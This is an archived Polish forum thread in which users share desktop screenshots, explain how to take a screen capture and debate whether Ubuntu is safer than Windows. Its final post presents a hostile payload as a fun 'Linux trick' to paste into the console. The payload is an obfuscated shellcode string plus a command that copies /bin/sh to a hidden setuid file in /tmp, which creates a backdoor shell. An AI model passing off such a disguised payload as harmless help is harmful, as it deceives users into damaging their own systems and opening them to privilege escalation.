Skocz do zawartości
Szukaj w
  • Więcej opcji...
Znajdź wyniki, które zawierają...
Szukaj wyników w...

Zarchiwizowany

Ten temat jest archiwizowany i nie można dodawać nowych odpowiedzi.

Lovelinka

pokażcie swoje pulpity(zdjęcia)

Polecane posty

Gość hyhy56ypi
jak zrobic zrzut z pulpitu?:P

wychodzisz ze wszystkiego żeby było widać pulpit, wciskasz print screen, klawisz na klawiaturze, potem otwierasz painta, wciskasz ctrl i v razem i masz, potem zzapisujesz obrazek:)

TenTamtem-----> że tak powiem zajebiście to wygląda nie tak jak nasz popularny Windows :P

ma wiele zalet :) więcej niż windows i wiekszość programów z windowsa na nim tez chodzi :) co ważne jest za darmo i nie ma na niego virusów ;)

ja mam kompa na gwarancji, kupiłam go z systemem to na razie nic nie zmieniam ale na przyszłość zastanowię się nad ubuntu:)

TenTamten konegund@tlen.pl'; ma wiele zalet więcej niż windows i wiekszość programów z windowsa na nim tez chodzi co ważne jest za darmo i nie ma na niego virusów Uwielbiam tą dziecięcą wiarę w bezpieczeństwo Linuxa :D

ubuntu możesz sciągnąć wypalić na płytke i kożystać bez instalacji na dysku :) z płytki :) się uruchamia :)

DANDELION.85 - Ubunto, to produkt "Nie dla idiotów", tam nie ma tak pięknie jak w windowsie.

-Bimbałek- nie dziecięca na linuxie siedze już pare lat :) no ale jak to bywa sa ludzie co wiedza lepiej :)

Gość przypadkowy nick
Dandelion, jestes z Tarnowa? witam w klubie ;)

TenTamten konegund@tlen.pl'; -Bimbałek- nie dziecięca na linuxie siedze już pare lat no ale jak to bywa sa ludzie co wiedza lepiej A ja hakuję Linuxa więcej niż parę lat :D

nie jestem idiotą, mimo że jestem kobietą to na kompach się z deka znam, a że piszę że ładnie to wygląda no bo wygląda. Ładniej niż Vista. Alone4ever spoko pulpit:) Widzę moją ulubioną gierke NFS MW :P. Moją i męza :D

Chcesz zobaczyć fajny trick pod Linuxem, co potrafi? Wpisz sobie to w konsolę: char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";